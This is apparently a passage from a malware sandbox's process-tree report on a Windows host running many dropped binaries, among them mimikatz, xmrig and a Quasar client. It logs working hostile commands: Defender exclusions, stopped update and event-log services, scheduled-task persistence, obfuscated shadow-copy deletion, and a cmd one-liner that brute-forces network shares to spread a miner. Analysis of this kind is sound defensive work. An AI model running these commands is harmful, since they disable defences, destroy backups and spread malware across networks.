- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2620
-
-
C:\Users\Admin\Desktop\a\build.exe"C:\Users\Admin\Desktop\a\build.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Users\Admin\Desktop\a\gem2.exe"C:\Users\Admin\Desktop\a\gem2.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5416 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵PID:4344
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵PID:4068
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
PID:5496
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:2632
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
PID:5700
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
PID:4888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
PID:6072
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5320
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6040
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5136
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GeekBrains"6⤵
- Launches sc.exe
PID:5228
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"6⤵
- Launches sc.exe
PID:2400
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
PID:5424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:868
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"6⤵
- Launches sc.exe
PID:2800 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5364
-
-
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5220 -
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"6⤵
- Executes dropped EXE
PID:4856
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 8006⤵
- Program crash
PID:5108
-
-
-
C:\Users\Admin\Desktop\a\cbot.exe"C:\Users\Admin\Desktop\a\cbot.exe"5⤵
- Drops startup file
- Executes dropped EXE
PID:5460
-
-
C:\Users\Admin\Desktop\a\Client.exe"C:\Users\Admin\Desktop\a\Client.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5536
-
-
C:\Users\Admin\Desktop\a\svhost.exe"C:\Users\Admin\Desktop\a\svhost.exe"5⤵
- Executes dropped EXE
PID:1668 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:916
-
-
-
C:\Users\Admin\Desktop\a\mimikatz.exe"C:\Users\Admin\Desktop\a\mimikatz.exe"5⤵
- Executes dropped EXE
PID:3764 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:7120
-
-
-
C:\Users\Admin\Desktop\a\123.exe"C:\Users\Admin\Desktop\a\123.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3856
-
-
C:\Users\Admin\Desktop\a\xmrig.exe"C:\Users\Admin\Desktop\a\xmrig.exe"5⤵
- Executes dropped EXE
PID:6212 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:760
-
-
-
C:\Users\Admin\Desktop\a\chrtrome22.exe"C:\Users\Admin\Desktop\a\chrtrome22.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:5348 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
PID:6280
-
-
C:\xmrig\xmrig-6.22.2\xmrig.exe"C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json6⤵
- Executes dropped EXE
PID:3828 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:6336
-
-
-
-
C:\Users\Admin\Desktop\a\Fixer.exe"C:\Users\Admin\Desktop\a\Fixer.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2276
-
-
C:\Users\Admin\Desktop\a\Client-built.exe"C:\Users\Admin\Desktop\a\Client-built.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1860
-
-
C:\Users\Admin\Desktop\a\Steanings.exe"C:\Users\Admin\Desktop\a\Steanings.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7068
-
-
C:\Users\Admin\Desktop\a\AsyncClientGK.exe"C:\Users\Admin\Desktop\a\AsyncClientGK.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6252
-
-
C:\Users\Admin\Desktop\a\RuntimeBroker.exe"C:\Users\Admin\Desktop\a\RuntimeBroker.exe"5⤵PID:4556
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4288
-
-
-
C:\Users\Admin\Desktop\a\uu.exe"C:\Users\Admin\Desktop\a\uu.exe"5⤵PID:3436
-
-
C:\Users\Admin\Desktop\a\Crawl.exe"C:\Users\Admin\Desktop\a\Crawl.exe"5⤵PID:2016
-
\??\c:\Windows\system32\wbem\wmic.exec:\svolxP\svol\..\..\Windows\svol\svol\..\..\system32\svol\svol\..\..\wbem\svol\svolx\..\..\wmic.exe shadowcopy delete6⤵PID:5484
-
-
\??\c:\Windows\system32\wbem\wmic.exec:\UptHgR\UptH\..\..\Windows\UptH\UptH\..\..\system32\UptH\UptH\..\..\wbem\UptH\UptHg\..\..\wmic.exe shadowcopy delete6⤵PID:6768
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 7206⤵
- Program crash
PID:5348
-
-
-
C:\Users\Admin\Desktop\a\sela.exe"C:\Users\Admin\Desktop\a\sela.exe"5⤵PID:5996
-
C:\Users\Admin\Desktop\a\._cache_sela.exe"C:\Users\Admin\Desktop\a\._cache_sela.exe"6⤵PID:560
-
C:\Users\Admin\Desktop\a\a\Client-base.exe"C:\Users\Admin\Desktop\a\a\Client-base.exe"7⤵PID:5624
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:3844
-
-
-
C:\Users\Admin\Desktop\a\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\a\voidware_loader.exe"7⤵PID:6628
-
C:\Users\Admin\Desktop\a\a\._cache_voidware_loader.exe"C:\Users\Admin\Desktop\a\a\._cache_voidware_loader.exe"8⤵PID:7880
-
C:\Users\Admin\Desktop\a\a\a\Client-base.exe"C:\Users\Admin\Desktop\a\a\a\Client-base.exe"9⤵PID:6480
-
-
C:\Users\Admin\Desktop\a\a\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\a\a\voidware_loader.exe"9⤵PID:5172
-
-
C:\Users\Admin\Desktop\a\a\a\build.exe"C:\Users\Admin\Desktop\a\a\a\build.exe"9⤵PID:5780
-
-
C:\Users\Admin\Desktop\a\a\a\gem2.exe"C:\Users\Admin\Desktop\a\a\a\gem2.exe"9⤵PID:6628
-
-
C:\Users\Admin\Desktop\a\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\a\gem1.exe"9⤵PID:952
-
C:\Users\Admin\Desktop\a\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\a\gem1.exe"10⤵PID:7816
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 79610⤵
- Program crash
PID:7012
-
-
-
-
-
C:\Users\Admin\Desktop\a\a\build.exe"C:\Users\Admin\Desktop\a\a\build.exe"7⤵PID:2208
-
-
C:\Users\Admin\Desktop\a\a\gem2.exe"C:\Users\Admin\Desktop\a\a\gem2.exe"7⤵PID:6924
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force8⤵
- Command and Scripting Interpreter: PowerShell
PID:8144
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart8⤵PID:6772
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart9⤵PID:6160
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc8⤵
- Launches sc.exe
PID:1028
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc8⤵
- Launches sc.exe
PID:5584
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv8⤵
- Launches sc.exe
PID:7484
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits8⤵
- Launches sc.exe
PID:6452
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc8⤵
- Launches sc.exe
PID:8208
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 08⤵
- Power Settings
PID:8528
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 08⤵
- Power Settings
PID:8028
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 08⤵
- Power Settings
PID:4916
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 08⤵
- Power Settings
PID:5140
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe8⤵PID:5156
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog8⤵
- Launches sc.exe
PID:9072
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"8⤵
- Launches sc.exe
PID:2760
-
-
-
-
-
C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"5⤵PID:5792
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:2284
-
-
-
C:\Users\Admin\Desktop\a\albt.exe"C:\Users\Admin\Desktop\a\albt.exe"5⤵PID:5604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 7406⤵
- Program crash
PID:4108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 6926⤵
- Program crash
PID:1560
-
-
-
C:\Users\Admin\Desktop\a\drop2.exe"C:\Users\Admin\Desktop\a\drop2.exe"5⤵PID:2724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"6⤵
- Command and Scripting Interpreter: PowerShell
PID:4228
-
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"5⤵PID:4600
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"6⤵PID:6260
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"6⤵PID:4840
-
-
-
C:\Users\Admin\Desktop\a\01.exe"C:\Users\Admin\Desktop\a\01.exe"5⤵PID:7332
-
C:\Users\Admin\Desktop\a\._cache_01.exe"C:\Users\Admin\Desktop\a\._cache_01.exe"6⤵PID:2044
-
-
-
C:\Users\Admin\Desktop\a\wudi.exe"C:\Users\Admin\Desktop\a\wudi.exe"5⤵PID:7720
-
-
C:\Users\Admin\Desktop\a\00.exe"C:\Users\Admin\Desktop\a\00.exe"5⤵PID:4916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 3406⤵
- Program crash
PID:8416
-
-
-
C:\Users\Admin\Desktop\a\64.exe"C:\Users\Admin\Desktop\a\64.exe"5⤵PID:7472
-
-
C:\Users\Admin\Desktop\a\02.exe"C:\Users\Admin\Desktop\a\02.exe"5⤵PID:7876
-
-
C:\Users\Admin\Desktop\a\32.exe"C:\Users\Admin\Desktop\a\32.exe"5⤵PID:1608
-
-
C:\Users\Admin\Desktop\a\IMG001.exe"C:\Users\Admin\Desktop\a\IMG001.exe"5⤵PID:8812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe6⤵PID:8060
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe7⤵
- Kills process with taskkill
PID:7584
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"6⤵PID:5840
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"6⤵PID:4880
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe7⤵PID:2400
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe8⤵
- Kills process with taskkill
PID:8392
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"7⤵PID:1576
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ7⤵PID:7308
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ8⤵PID:8696
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"7⤵PID:4172
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"8⤵
- Scheduled Task/Job: Scheduled Task
PID:9012
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"7⤵PID:828
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"8⤵
- Scheduled Task/Job: Scheduled Task
PID:8836
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0007⤵
- Power Settings
PID:6848 -
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 08⤵
- Power Settings
PID:3056
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 08⤵
- Power Settings
PID:5880
-
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0008⤵
- Power Settings
PID:8740
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0208& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))7⤵
- Indicator Removal: Network Share Connection Removal
PID:9152 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"8⤵
- Network Service Discovery
PID:8972 -
C:\Windows\SysWOW64\net.exenet view9⤵
- Discovers systems in the same network
PID:7836
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"9⤵PID:5072
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a9⤵
- Network Service Discovery
PID:6376
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"9⤵PID:1560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_8⤵PID:1192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "8⤵PID:3476
-
C:\Windows\SysWOW64\net.exenet view \\10.127.0.19⤵
- Discovers systems in the same network
PID:4100
-
-
C:\Windows\SysWOW64\find.exefind /i " "9⤵PID:4976
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y8⤵
- Indicator Removal: Network Share Connection Removal
PID:8188
-
-
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"5⤵PID:5004
-
C:\Users\Admin\AppData\Local\Temp\is-J5I3T.tmp\Kerish_Doctor_2022.tmp"C:\Users\Admin\AppData\Local\Temp\is-J5I3T.tmp\Kerish_Doctor_2022.tmp" /SL5="$40332,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"6⤵PID:3308
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"5⤵PID:376
-
C:\Users\Admin\AppData\Local\Temp\is-1L18H.tmp\Kerish_Doctor_2023.tmp"C:\Users\Admin\AppData\Local\Temp\is-1L18H.tmp\Kerish_Doctor_2023.tmp" /SL5="$E02E8,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"6⤵PID:2772
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"5⤵PID:3932
-
C:\Users\Admin\AppData\Local\Temp\is-VR0QM.tmp\Kerish_Doctor.tmp"C:\Users\Admin\AppData\Local\Temp\is-VR0QM.tmp\Kerish_Doctor.tmp" /SL5="$80042,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor.exe"6⤵PID:3268
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2021.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2021.exe"5⤵PID:3692
-
C:\Users\Admin\AppData\Local\Temp\is-J323G.tmp\Kerish_Doctor_2021.tmp"C:\Users\Admin\AppData\Local\Temp\is-J323G.tmp\Kerish_Doctor_2021.tmp" /SL5="$402E2,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2021.exe"6⤵PID:1252
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.2.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.2.exe"5⤵PID:7296
-
C:\Users\Admin\AppData\Local\Temp\is-NSU4O.tmp\Kerish_Doctor_Windows_8.2.tmp"C:\Users\Admin\AppData\Local\Temp\is-NSU4O.tmp\Kerish_Doctor_Windows_8.2.tmp" /SL5="$80452,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.2.exe"6⤵PID:7480
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_XP.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_XP.exe"5⤵PID:2616
-
C:\Users\Admin\AppData\Local\Temp\is-RQT49.tmp\Kerish_Doctor_Windows_XP.tmp"C:\Users\Admin\AppData\Local\Temp\is-RQT49.tmp\Kerish_Doctor_Windows_XP.tmp" /SL5="$3050A,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_XP.exe"6⤵PID:5168
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0x8,0x124,0x7ffb4bc5cc40,0x7ffb4bc5cc4c,0x7ffb4bc5cc583⤵PID:2272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2012,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2008 /prefetch:23⤵PID:724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:33⤵PID:1152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2276 /prefetch:83⤵PID:3616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:13⤵PID:3052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:13⤵PID:3380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4504,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4536 /prefetch:13⤵PID:4296
-
-
